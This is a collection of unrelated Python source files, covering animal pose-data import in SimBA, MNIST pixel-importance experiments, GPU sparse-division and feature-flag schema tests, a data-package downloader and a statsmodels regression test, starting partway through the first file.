'_y'), ('Animal_' + str(animal+1) + '_' + bp + '_p') xy_heads.extend((colName1, colName2)) bp_cord_names.append('_' + bp + '_x') bp_cord_names.append('_' + bp + '_y') bpNameList.extend((colName1, colName2, colName3)) dfHeader.extend((colName1, colName2, colName3)) if poseEstimationSetting == 'user_defined': config.set("General settings", "animal_no", str(animalsNo)) with open(configFile, "w+") as f: config.write(f) f.close() bpNameListGrouped = [tuple(bpNameList[i:i + 3]) for i in range(0, len(bpNameList), 3)] video_df.columns = dfHeader video_df.fillna(0, inplace=True) simba.rw_dfs.save_df(video_df, wfileType, savePath) 
csvPaths.append(savePath) print('Saved file ' + savePath + '...') ###### ASSIGN IDENTITIES global currIDcounter def define_ID(event, x, y, flags, param): global currIDcounter if (event == cv2.EVENT_LBUTTONDBLCLK): centerX, centerY, currID = (int(x), int(y), currIDList[currIDcounter]) ID_user_cords.append([centerX, centerY, currIDList[currIDcounter]]) cv2.putText(overlay, str(currID), (centerX, centerY), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (0, 255, 0), 5) currIDcounter += 1 cmap, colorList = cm.get_cmap(str('tab10'), animalsNo + 1), [] for i in range(cmap.N): rgb = list((cmap(i)[:3])) rgb = [i * 255 for i in rgb] rgb.reverse() colorList.append(rgb) for csvFile in csvPaths: indBpCordList, frameNumber, addSpacer, EuclidDistanceList, changeList = [], 0, 2, [], [] ID_user_cords, currIDcounter = [], 0 assigningIDs, completePromt, chooseFrame, assignBpCords = False, False, True, True currDf = simba.rw_dfs.read_df(csvFile, wfileType) vidFname = os.path.join(videoFolder, os.path.basename(csvFile).replace('.csv', '.mp4')) vidBasename = os.path.basename(vidFname) if not os.path.exists(vidFname): raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), vidFname) cap = cv2.VideoCapture(vidFname) if not cap.isOpened(): raise Exception('Con\'t open video file ' + vidFname) width, height = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)), int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) mySpaceScale, myRadius, myResolution, myFontScale = 40, 10, 1500, 1.2 maxResDimension = max(width, height) circleScale, fontScale, spacingScale = int(myRadius / (myResolution / maxResDimension)), float(myFontScale / (myResolution / maxResDimension)), int(mySpaceScale / (myResolution / maxResDimension)) cv2.namedWindow('Define animal IDs', cv2.WINDOW_NORMAL) while (1): if (chooseFrame == True) and (assignBpCords == True): cv2.namedWindow('Define animal IDs', cv2.WINDOW_NORMAL) cap.set(1, frameNumber) ret, frame = cap.read() if not ret: raise Exception('Can\'t read video file ' + vidFname) overlay = frame.copy() for animal_bps in range(len(bpNameListGrouped)): currCols = bpNameListGrouped[animal_bps] currcolor = tuple(colorList[animal_bps]) x_cord = currDf.at[frameNumber, currCols[0]] y_cord = currDf.at[frameNumber, currCols[1]] indBpCordList.append([x_cord, y_cord, currCols[2]]) cv2.circle(overlay, (int(x_cord), int(y_cord)), circleScale, currcolor, -1, lineType=cv2.LINE_AA) for loop, name in enumerate(indBpCordList): currstring = name[2] for substring in bp_cord_names: if substring in currstring: newstring = currstring.replace(substring, '') indBpCordList[loop][2] = newstring imWithCordsOnly = overlay.copy() chooseFrame = False if (chooseFrame == False) and (assignBpCords == True): sideImage = np.ones((int(height / 2), width, 3)) cv2.putText(sideImage, 'Current video: ' + str(vidBasename), (10, int(spacingScale)),cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3) cv2.putText(sideImage, 'Can you assign identities based on the displayed frame ?', (10, int(spacingScale * (addSpacer * 2))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3) cv2.putText(sideImage, 'Press "x" to display new, random, frame', (10, int(spacingScale * (addSpacer * 3))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 0), 3) cv2.putText(sideImage, 'Press "c" to continue to start assigning identities using this frame', (10, int(spacingScale * (addSpacer * 4))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (0, 255), 3) imageConcat = np.concatenate((overlay, sideImage), axis=0) imageConcat = np.uint8(imageConcat) cv2.imshow('Define animal IDs', imageConcat) k 
= cv2.waitKey(10) if k == ord('x'): cv2.destroyWindow('Define animal IDs') chooseFrame, assignBpCords = True, True frameNumber += 50 elif k == ord('c'): chooseFrame, assignBpCords = False, False assigningIDs, completePromt, assigningIDs = True, False, True if assigningIDs == True: sideImage = np.ones((int(height / 2), width, 3)) cv2.putText(sideImage, 'Double left mouse click on:', (10, int(spacingScale)), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3) cv2.putText(sideImage, str(currIDList[currIDcounter]), (10, int(spacingScale * (addSpacer*2))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 0), 3) imageConcat = np.concatenate((overlay, sideImage), axis=0) imageConcat = np.uint8(imageConcat) cv2.setMouseCallback('Define animal IDs', define_ID) cv2.imshow('Define animal IDs', imageConcat) cv2.waitKey(10) if currIDcounter >= len(currIDList): cv2.destroyWindow('Define animal IDs') assigningIDs, completePromt = False, True if completePromt == True: cv2.namedWindow('Define animal IDs', cv2.WINDOW_NORMAL) sideImage = np.ones((int(height/2), width, 3)) cv2.putText(sideImage, 'Current video: ' + str(vidBasename), (10, int(spacingScale)), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3) cv2.putText(sideImage, 'Are you happy with your assigned identities ?', (10, int(spacingScale * (addSpacer*2))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 255), 3) cv2.putText(sideImage, 'Press "c" to continue (to finish, or proceed to the next video)', (10, int(spacingScale * (addSpacer*3))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (255, 255, 0), 3) cv2.putText(sideImage, 'Press "x" to re-start assigning identities', (10, int(spacingScale * (addSpacer*4))), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (0, 255, 255), 3) imageConcat = np.concatenate((overlay, sideImage), axis=0) imageConcat = np.uint8(imageConcat) cv2.imshow('Define animal IDs', imageConcat) k = cv2.waitKey(10) if k == ord('c'): cv2.destroyWindow('Define animal IDs') break if k == ord('x'): overlay = imWithCordsOnly.copy() ID_user_cords, currIDcounter = [], 0 assigningIDs, completePromt = True, False print('Re-organizing pose data-frame based on user-assigned identities: ' + str(os.path.basename(vidFname)) + '....') for values in ID_user_cords: currClickedX, currClickedY, currClickedID = values[0], values[1], values[2] for bpCords in indBpCordList: currX, currY, ID = bpCords[0], bpCords[1], bpCords[2] currEuclidian = np.sqrt((currClickedX - currX) ** 2 + (currClickedY - currY) ** 2) EuclidDistanceList.append([currEuclidian, currClickedID, ID]) euclidDf = pd.DataFrame(EuclidDistanceList) euclidDf.columns = ['Distance', 'clickID', 'pose_ID'] for i in currIDList: minDistance = euclidDf.loc[euclidDf['clickID'] == i, 'Distance'].min() animalPoseID = euclidDf.loc[euclidDf['Distance'] == minDistance, 'pose_ID'].iloc[0] changeList.append([animalPoseID, i]) for animal in changeList: currPoseName, newName = animal[0], animal[1] loop = 0 for header in bpNameList: if header.startswith(currPoseName): newHeader = header.replace(currPoseName, newName) bpNameList[loop] = newHeader loop += 1 currDf.columns = bpNameList outDf = pd.DataFrame() for name in currIDList: currCols = [col for col in currDf.columns if name in col] sliceDf = currDf[currCols] outDf = pd.concat([outDf, sliceDf], axis=1) outDfcols = list(outDf.columns) toBpCSVlist = [] if poseEstimationSetting == 'user_defined': for i in outDfcols: currBpName = i[:-2] for identityNo in range(len(currIDList)): if str(currIDList[identityNo]) in currBpName: currBpName = currBpName + '_' + 
str(identityNo+1)
            if currBpName not in toBpCSVlist:
                toBpCSVlist.append(currBpName)
        with open(bpNamesCSVPath, 'w+') as f:
            for i in toBpCSVlist:
                f.write(i + '\n')
    MultiIndexCol = []
    for column in range(len(outDf.columns)):
        MultiIndexCol.append(tuple(('SLEAP_multi', 'SLEAP_multi', outDf.columns[column])))
    outDf.columns = pd.MultiIndex.from_tuples(MultiIndexCol, names=['scorer', 'bodypart', 'coords'])
    outputCSVname = os.path.basename(vidFname).replace('.mp4', '.csv')
    outDf.to_csv(os.path.join(outputDfFolder, outputCSVname))
    print('Imported ', outputCSVname, 'to project.')

print('All multi-animal SLEAP .h5 tracking files ordered and imported into SimBA project in CSV file format')
11589753
import sys import os from os import path sys.path.append(path.dirname(path.dirname(os.getcwd()))) from arch.sensitivity.GDNet import GDNet from arch.sensitivity.BDNet import BDNet, IsingBDNet, IsingSoftPenaltyBDNet, \ ImageWindowBDNet, OppositeGernarativeL1BDNet from exp.loaddata_utils import load_mnist_keras_test_imgs import torch import torch.nn.functional as F import matplotlib.pyplot as plt import mnist_compare_utils from torch.utils.data import DataLoader, TensorDataset from arch.DeepLiftNet import DeepLiftNet from torchvision.utils import make_grid import argparse import pkgutil import exp.utils_visualise as utils_visualize from scipy.stats import rankdata torch.manual_seed(1) def repeat_img_in_batch(the_img, the_label, batch_size): ''' Return pytorch loader by repeating one img in batch size. :param the_img: numpy img of size [1, 28, 28] :param the_label: integer of class :param batch_size: number to get samples in NN :return: pytorch loader ''' the_img = torch.FloatTensor(the_img) # Repeat the image "batch_size" times repeated_imgs = the_img.unsqueeze(0).expand(batch_size, 1, 28, 28) repeated_labels = torch.LongTensor(1).fill_(int(the_label)).expand(batch_size) return [(repeated_imgs, repeated_labels)] # train_loader = torch.utils.data.DataLoader( # TensorDataset(repeated_imgs, repeated_labels), # batch_size=batch_size, shuffle=False) # return train_loader def load_classifier(cuda_enabled=False): model = DeepLiftNet() model.load_state_dict(torch.load('model/mnist_cnn_allconv_pytorch')) model.float() model.eval() if cuda_enabled: model.cuda() return model def visualize_imgs(imgs, nrow): imgs = torch.from_numpy(imgs) grid = make_grid(imgs, nrow=nrow) def pytorch_to_np(pytorch_image): return pytorch_image.mul(255).clamp(0, 255).byte().permute(1, 2, 0).numpy() ndarr = pytorch_to_np(grid) im = plt.imshow(ndarr, interpolation='nearest') plt.show() def train_log_odds_diff(rank_func, classifier, dataset, from_digit, to_digit, visualize=False, top_number=-1, batch_size=128, cuda_enabled=False): x, y = dataset # Get those images that correpsond to the from_digit class target_x = x[y == from_digit, ...] target_y = y[y == from_digit][:top_number] if top_number > 0: target_x = target_x[:top_number, ...] 
target_y = target_y[:top_number] # Set up pytorch data and model diff = [] overlayed_imgs = [] ranks = [] for the_x, the_y in zip(target_x, target_y): loader = repeat_img_in_batch(the_x, the_y, batch_size=batch_size) rank = rank_func(classifier, loader) # Rank log odds diff the_img = torch.from_numpy(the_x) log_odds, order, flipped_img = mnist_compare_utils.cal_logodds_diff_btw_two_class( classifier, the_img, from_digit=from_digit, to_digit=to_digit, importance_2d=rank, flip_percentage=0.20, flip_val=0., cuda_enabled=cuda_enabled) diff.append(log_odds[-1] - log_odds[0]) # ranks.append(rank.numpy()) if visualize: # plt.imshow(flipped_img, interpolation='nearest') # plt.colorbar() # plt.show() # img = utils_visualize.overlay(the_x[0, ...], rank.numpy()) img, clim = utils_visualize.overlay(the_x[0, ...], flipped_img) overlayed_imgs.append(torch.from_numpy(img)) return diff, overlayed_imgs, ranks def main(rank_func, from_digit=8, to_digit=3, top_n=2, cuda_enabled=False, visualize=False): classifer = load_classifier(cuda_enabled=cuda_enabled) X_test, y_test = load_mnist_keras_test_imgs() return train_log_odds_diff(rank_func, classifer, (X_test, y_test), from_digit, to_digit, top_number=top_n, batch_size=64, cuda_enabled=cuda_enabled, visualize=visualize) def parse_args(): parser = argparse.ArgumentParser(description='PyTorch Deeplift comparison') parser.add_argument('--model', type=str, default='vbd_opposite', choices=['vbd', 'vgd', 'p_b', 'p_g', 'ising_vbd', 'ising_soft_vbd', 'vbd_window'], help='choose from ["vbd_rank_func", "bern", "add_gauss"]') parser.add_argument('--l1_reg_coef', type=float, default=0.1, help='Only use in IsingBDNet') parser.add_argument('--l2_reg_coef', type=float, default=0., help='Only use in IsingBDNet') parser.add_argument('--window', type=int, default=2, help='Perturbation size. Used in p_b or vbd_window') parser.add_argument('--from-digit', type=int, default=8, help='mask from some digits') parser.add_argument('--to-digit', type=int, default=3, help='masked to some digits') parser.add_argument('--verbose', type=int, default=1) parser.add_argument('--top_n', type=int, default=1, help='-1 means whole test sets') parser.add_argument('--no-cuda', action='store_false', default=True, help='disables CUDA training') parser.add_argument('--visualize', action='store_false', default=True) args, _ = parser.parse_known_args() args.cuda = not args.no_cuda and torch.cuda.is_available() print 'cuda:', args.cuda # CS server settings if args.cuda and pkgutil.find_loader('gpu_lock') is not None: import gpu_lock board = gpu_lock.obtain_lock_id() torch.cuda.set_device(board) print 'start using gpu device: %d' % board return args def run(args): def log_odds_criteria(outputs, targets): # It needs to return the things needs to be minimized. return (outputs[:, args.from_digit] - outputs[:, args.to_digit]).mean() def vbd_opposite(classifier, loader): input_size = (1, 28, 28) vbdnet = OppositeGernarativeL1BDNet(input_size, trained_classifier=classifier, ard_init=0., lr=0.01, reg_coef=0., rw_max=30, cuda_enabled=args.cuda, loss_criteria=log_odds_criteria, verbose=args.verbose) vbdnet.fit(loader, epochs=200, epoch_print=10) # The smaller the dropout rate is, it's less important. rank = vbdnet.logit_p.data[0, ...] 
return rank def vbd(classifier, loader): input_size = (1, 28, 28) vbdnet = BDNet(input_size, trained_classifier=classifier, ard_init=0., lr=0.01, reg_coef=1E-7, rw_max=30, cuda_enabled=args.cuda, estop_num=10, clip_max=100, flip_val=0., loss_criteria=log_odds_criteria, flip_train=False, verbose=args.verbose, ) vbdnet.fit(loader, epochs=1000, epoch_print=10) # The smaller the dropout rate is, it's less important. rank = vbdnet.logit_p.data[0, ...] return rank def vbd_window(classifier, loader): input_size = (1, 28, 28) rank = ImageWindowBDNet.fit_multiple_windows( loader, epochs=1000, epoch_print=10, dropout_param_size=input_size, trained_classifier=classifier, loss_criteria=log_odds_criteria, ard_init=0., lr=0.01, reg_coef=0., rw_max=30, cuda_enabled=args.cuda, verbose=args.verbose, estop_num=None, clip_max=100, flip_val=0., flip_train=False, window_size=args.window) return rank def _ising_common(classifier, loader, model): input_size = (1, 28, 28) vbdnet = model(input_size, trained_classifier=classifier, ard_init=0., lr=0.01, reg_coef=0., rw_max=30, cuda_enabled=args.cuda, estop_num=10, clip_max=100, flip_val=0., loss_criteria=log_odds_criteria, flip_train=False, verbose=args.verbose, l1_reg_coef=args.l1_reg_coef, l2_reg_coef=args.l2_reg_coef ) vbdnet.fit(loader, epochs=1000, epoch_print=10) # The smaller the dropout rate is, it's rank = vbdnet.logit_p.data[0, ...] return rank def ising_vbd(classifier, loader): return _ising_common(classifier, loader, IsingBDNet) def ising_soft_vbd(classifier, loader): return _ising_common(classifier, loader, IsingSoftPenaltyBDNet) def vgd(classifier, loader, vd_model=GDNet): input_size = (1, 28, 28) gauss_net = vd_model(input_size, trained_classifier=classifier, ard_init=-6., lr=0.03, reg_coef=0., rw_max=30, cuda_enabled=args.cuda, estop_num=1., clip_max=100., loss_criteria=log_odds_criteria, verbose=args.verbose ) gauss_net.fit(loader, epochs=500, epoch_print=10) return gauss_net.log_alpha.data[0, ...] def p_b(classifier, loader): def perturb_by_binary(feature_idx, old_val): return torch.zeros(old_val.size()) classifier.set_criteria(log_odds_criteria) return -mnist_compare_utils.perturb_2d(classifier, loader, perturb_by_binary, window=args.window, cuda_enabled=args.cuda) def p_g(classifier, loader): def perturb_by_multiply_gauss(feature_idx, old_val, var=0.5): return old_val + old_val * var * torch.normal(torch.zeros(*old_val.size()), 1) classifier.set_criteria(log_odds_criteria) return -mnist_compare_utils.perturb_2d(classifier, loader, perturb_by_multiply_gauss, num_samples=10, window=args.window, cuda_enabled=args.cuda) rank_func = eval(args.model) diff, overlayed_imgs, _ = main(rank_func, args.from_digit, args.to_digit, args.top_n, cuda_enabled=args.cuda, visualize=args.visualize) print diff if args.visualize: utils_visualize.save_figs(overlayed_imgs, filename='', visualize=True, nrow=8) else: torch.save(diff, 'result/deeplift-%d-%d-%s-%d.pkl' % (args.from_digit, args.to_digit, args.model, args.window)) return diff, overlayed_imgs if __name__ == '__main__': args = parse_args() run(args)
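# Reading of the objective above (interpretation of the code, not from any
# upstream docs): log_odds_criteria is minimized, i.e. the mean of
# logit[from_digit] - logit[to_digit] is pushed down, so each rank_func scores
# the ~20% of pixels (flip_percentage=0.20 in train_log_odds_diff) whose
# flipping most moves an image of from_digit toward being read as to_digit.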
11589755
import numpy as np import scipy.sparse import akg from akg import tvm from akg import composite from akg.utils import CUDA from tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor from akg.utils import kernel_exec as utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array def csr_div(dense, sparse_data, col_idx, row_idx, shape, target=CUDA): assert target == CUDA, "only supports GPU" return composite.csr_div((row_idx, col_idx, sparse_data, dense), {"dense_shape": shape}) def gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.divide(1, np.broadcast_to(dense, shape2))) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def csr_div_run(shape1, shape2, dtype1, dtype2, poly_sch=True, attrs=None): if not attrs: attrs = {"target": "cuda"} # gen data op_attrs = [shape2] dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape attrs["csr_avg_row"] = sparse_data.shape[0] // shape1[0] attrs["is_csr"] = True mod = utils.op_build_test(csr_div, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name="csr_div") if len(expect.shape) == 0: output_shape = (1, ) output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol = get_rtol_atol("csr_div", dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol) print("Test {}".format("Pass" if res else "Failed")) target_name = attrs["target"].split()[0] if not res: mod_source = mod if target_name != "llvm": mod_source = mod.imported_modules[0] print("Error {}:========================".format(target_name)) print(mod_source.get_source()) raise AssertionError("Test fail") if attrs["profiling"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name, 0)) target_profiling(mod, *args_list, target=target_name, repeat_time=attrs["repeat_times"]) return (dense, sparse_data, col_idx, row_idx), output, expect, res
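if __name__ == '__main__':
    # Minimal sketch of the CSR triplet consumed by csr_div above: indptr
    # (row_idx) bounds each row's slice of data (sparse_data) and indices
    # (col_idx).
    m = scipy.sparse.csr_matrix(np.array([[0., 2., 0.], [1., 0., 3.]]))
    print(m.data)     # [2. 1. 3.]
    print(m.indices)  # [1 0 2]
    print(m.indptr)   # [0 1 3]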
11589805
import logging import pytest # noqa: F401 from aws_lambda_powertools.utilities.feature_flags.exceptions import SchemaValidationError from aws_lambda_powertools.utilities.feature_flags.schema import ( CONDITION_ACTION, CONDITION_KEY, CONDITION_VALUE, CONDITIONS_KEY, FEATURE_DEFAULT_VAL_KEY, RULE_MATCH_VALUE, RULES_KEY, ConditionsValidator, RuleAction, RulesValidator, SchemaValidator, ) logger = logging.getLogger(__name__) EMPTY_SCHEMA = {"": ""} def test_invalid_features_dict(): validator = SchemaValidator(schema=[]) with pytest.raises(SchemaValidationError): validator.validate() def test_empty_features_not_fail(): validator = SchemaValidator(schema={}) validator.validate() @pytest.mark.parametrize( "schema", [ pytest.param({"my_feature": []}, id="feat_as_list"), pytest.param({"my_feature": {}}, id="feat_empty_dict"), pytest.param({"my_feature": {FEATURE_DEFAULT_VAL_KEY: "False"}}, id="feat_default_non_bool"), pytest.param({"my_feature": {FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: "4"}}, id="feat_rules_non_dict"), pytest.param("%<>[]{}|^", id="unsafe-rfc3986"), ], ) def test_invalid_feature(schema): validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() def test_valid_feature_dict(): # empty rules list schema = {"my_feature": {FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: []}} validator = SchemaValidator(schema) validator.validate() # no rules list at all schema = {"my_feature": {FEATURE_DEFAULT_VAL_KEY: False}} validator = SchemaValidator(schema) validator.validate() def test_invalid_rule(): # rules list is not a list of dict schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: [ "a", "b", ], } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() # rules RULE_MATCH_VALUE is not bool schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 345345435": { RULE_MATCH_VALUE: "False", } }, } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() # missing conditions list schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 345345435": { RULE_MATCH_VALUE: False, } }, } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() # condition list is empty schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 345345435": {RULE_MATCH_VALUE: False, CONDITIONS_KEY: []}, }, } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() # condition is invalid type, not list schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 345345435": {RULE_MATCH_VALUE: False, CONDITIONS_KEY: {}}, }, } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() def test_invalid_condition(): # invalid condition action schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 345345435": { RULE_MATCH_VALUE: False, CONDITIONS_KEY: {CONDITION_ACTION: "stuff", CONDITION_KEY: "a", CONDITION_VALUE: "a"}, } }, } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() # missing condition key and value schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 345345435": { RULE_MATCH_VALUE: False, CONDITIONS_KEY: {CONDITION_ACTION: RuleAction.EQUALS.value}, } }, } } validator = SchemaValidator(schema) 
with pytest.raises(SchemaValidationError): validator.validate() # invalid condition key type, not string schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 345345435": { RULE_MATCH_VALUE: False, CONDITIONS_KEY: { CONDITION_ACTION: RuleAction.EQUALS.value, CONDITION_KEY: 5, CONDITION_VALUE: "a", }, } }, } } validator = SchemaValidator(schema) with pytest.raises(SchemaValidationError): validator.validate() def test_valid_condition_all_actions(): schema = { "my_feature": { FEATURE_DEFAULT_VAL_KEY: False, RULES_KEY: { "tenant id equals 645654 and username is a": { RULE_MATCH_VALUE: True, CONDITIONS_KEY: [ { CONDITION_ACTION: RuleAction.EQUALS.value, CONDITION_KEY: "tenant_id", CONDITION_VALUE: "645654", }, { CONDITION_ACTION: RuleAction.STARTSWITH.value, CONDITION_KEY: "username", CONDITION_VALUE: "a", }, { CONDITION_ACTION: RuleAction.ENDSWITH.value, CONDITION_KEY: "username", CONDITION_VALUE: "a", }, { CONDITION_ACTION: RuleAction.IN.value, CONDITION_KEY: "username", CONDITION_VALUE: ["a", "b"], }, { CONDITION_ACTION: RuleAction.NOT_IN.value, CONDITION_KEY: "username", CONDITION_VALUE: ["c"], }, { CONDITION_ACTION: RuleAction.KEY_IN_VALUE.value, CONDITION_KEY: "username", CONDITION_VALUE: ["a", "b"], }, { CONDITION_ACTION: RuleAction.KEY_NOT_IN_VALUE.value, CONDITION_KEY: "username", CONDITION_VALUE: ["c"], }, { CONDITION_ACTION: RuleAction.VALUE_IN_KEY.value, CONDITION_KEY: "groups", CONDITION_VALUE: "SYSADMIN", }, { CONDITION_ACTION: RuleAction.VALUE_NOT_IN_KEY.value, CONDITION_KEY: "groups", CONDITION_VALUE: "GUEST", }, ], } }, } } validator = SchemaValidator(schema) validator.validate() def test_validate_condition_invalid_condition_type(): # GIVEN an invalid condition type of empty dict condition = {} # WHEN calling validate_condition # THEN raise SchemaValidationError with pytest.raises(SchemaValidationError, match="Feature rule condition must be a dictionary"): ConditionsValidator.validate_condition(condition=condition, rule_name="dummy") def test_validate_condition_invalid_condition_action(): # GIVEN an invalid condition action of foo condition = {"action": "INVALID", "key": "tenant_id", "value": "12345"} # WHEN calling validate_condition # THEN raise SchemaValidationError with pytest.raises(SchemaValidationError, match="'action' value must be either"): ConditionsValidator.validate_condition_action(condition=condition, rule_name="dummy") def test_validate_condition_invalid_condition_key(): # GIVEN a configuration with a missing "key" condition = {"action": RuleAction.EQUALS.value, "value": "12345"} # WHEN calling validate_condition # THEN raise SchemaValidationError with pytest.raises(SchemaValidationError, match="'key' value must be a non empty string"): ConditionsValidator.validate_condition_key(condition=condition, rule_name="dummy") def test_validate_condition_missing_condition_value(): # GIVEN a configuration with a missing condition value condition = { "action": RuleAction.EQUALS.value, "key": "tenant_id", } # WHEN calling validate_condition with pytest.raises(SchemaValidationError, match="'value' key must not be empty"): ConditionsValidator.validate_condition_value(condition=condition, rule_name="dummy") def test_validate_rule_invalid_rule_type(): # GIVEN an invalid rule type of empty list # WHEN calling validate_rule # THEN raise SchemaValidationError with pytest.raises(SchemaValidationError, match="Feature rule must be a dictionary"): RulesValidator.validate_rule(rule=[], rule_name="dummy", feature_name="dummy") def 
test_validate_rule_invalid_rule_name(): # GIVEN a rule name is empty # WHEN calling validate_rule_name # THEN raise SchemaValidationError with pytest.raises(SchemaValidationError, match="Rule name key must have a non-empty string"): RulesValidator.validate_rule_name(rule_name="", feature_name="dummy")
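# An end-to-end sketch mirroring the valid cases above (illustrative, not part of the
# original suite): one feature with a boolean default and a single EQUALS condition.
def test_valid_single_rule_schema():
    schema = {
        "my_feature": {
            FEATURE_DEFAULT_VAL_KEY: False,
            RULES_KEY: {
                "tenant id equals 12345": {
                    RULE_MATCH_VALUE: True,
                    CONDITIONS_KEY: [
                        {
                            CONDITION_ACTION: RuleAction.EQUALS.value,
                            CONDITION_KEY: "tenant_id",
                            CONDITION_VALUE: "12345",
                        },
                    ],
                },
            },
        }
    }
    # a well-formed schema validates without raising SchemaValidationError
    SchemaValidator(schema).validate()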
11589821
import os from .Package import Package from odufrn_downloader.exceptions import odufrIOError class File(Package): """Class responsible for downloading packages listed in a file.""" def __init__(self): super().__init__() def download_from_file(self, filename: str, path: str = os.getcwd(), dictionary: bool = True, years: list = None): """Downloads the data packages listed in a text file. > Example: download_from_file('packages_ufrn.txt') Parameters ---------- filename: str name of the file that contains the package names. path: str path of the folder where the downloaded files will be placed (by default, the current folder). dictionary: bool flag to also download the data dictionary (by default, True). years: list years of the data to be downloaded; when provided, only those years are fetched """ try: with open(filename, 'r') as file: for packageName in file: self.download_package( packageName.rstrip(), path, dictionary, years ) except IOError: raise odufrIOError()
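# Illustrative usage (a sketch, not part of the original module; assumes a local
# 'packages_ufrn.txt' listing one package name per line):
#   downloader = File()
#   downloader.download_from_file('packages_ufrn.txt', path='./data', dictionary=True)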
11589878
from .morphology import * from .spatialneuron import * __all__ = ['Morphology', 'Soma', 'Cylinder', 'Section', 'SpatialNeuron']
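# Illustrative use of the re-exported API (a sketch; assumes brian2's unit system is in scope):
#   from brian2 import um
#   morpho = Soma(diameter=30*um)
#   morpho.axon = Cylinder(diameter=1*um, length=100*um, n=10)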
11589899
import pandas import pytest from tns_watcher import get_tns from utils import load_config, log, Mongo """ load config and secrets """ config = load_config(config_file="config.yaml")["kowalski"] class TestTNSWatcher: """ Test TNS monitoring """ @pytest.mark.xfail(raises=pandas.errors.ParserError) def test_tns_watcher(self): log("Connecting to DB") mongo = Mongo( host=config["database"]["host"], port=config["database"]["port"], replica_set=config["database"]["replica_set"], username=config["database"]["username"], password=config["database"]["password"], db=config["database"]["db"], verbose=True, ) log("Successfully connected") collection = config["database"]["collections"]["tns"] log( "Grabbing most recent object from the TNS and ingesting that into the database" ) get_tns( grab_all=False, test=True, ) log("Done") fetched_entries = list(mongo.db[collection].find({}, {"_id": 1})) assert len(fetched_entries) > 0
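# A possible follow-up assertion (illustrative sketch; relies only on the pymongo
# collection API already used above):
#   latest = mongo.db[collection].find_one({}, sort=[("_id", -1)])
#   assert latest is not None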
11589908
import numpy as np from numpy.testing import assert_almost_equal from statsmodels.datasets import statecrime from statsmodels.regression.linear_model import OLS from statsmodels.stats.outliers_influence import ( reset_ramsey, variance_inflation_factor, ) from statsmodels.tools import add_constant def test_reset_stata(): data = statecrime.load_pandas().data mod = OLS(data.violent, add_constant(data[["murder", "hs_grad"]])) res = mod.fit() stat = reset_ramsey(res, degree=4) assert_almost_equal(stat.fvalue[0, 0], 1.52, decimal=2) assert_almost_equal(stat.pvalue, 0.2221, decimal=4) exog_idx = list(data.columns).index("urban") data_arr = np.asarray(data) vif = variance_inflation_factor(data_arr, exog_idx) assert_almost_equal(vif, 16.4394, decimal=4) exog_idx = list(data.columns).index("urban") vif_df = variance_inflation_factor(data, exog_idx) assert_almost_equal(vif_df, 16.4394, decimal=4)
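# Cross-check sketch (illustrative, not part of the upstream suite): the helper
# computes VIF_j = 1 / (1 - R_j^2), where R_j^2 is the R-squared from regressing
# column j on the remaining columns (no constant is added by the helper itself).
def manual_vif(exog, exog_idx):
    exog = np.asarray(exog)
    endog = exog[:, exog_idx]  # column whose inflation we measure
    others = np.delete(exog, exog_idx, axis=1)  # all remaining columns
    r_squared = OLS(endog, others).fit().rsquared
    return 1.0 / (1.0 - r_squared)
# e.g. manual_vif(data, exog_idx) should agree with the 16.4394 asserted above.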
11589910
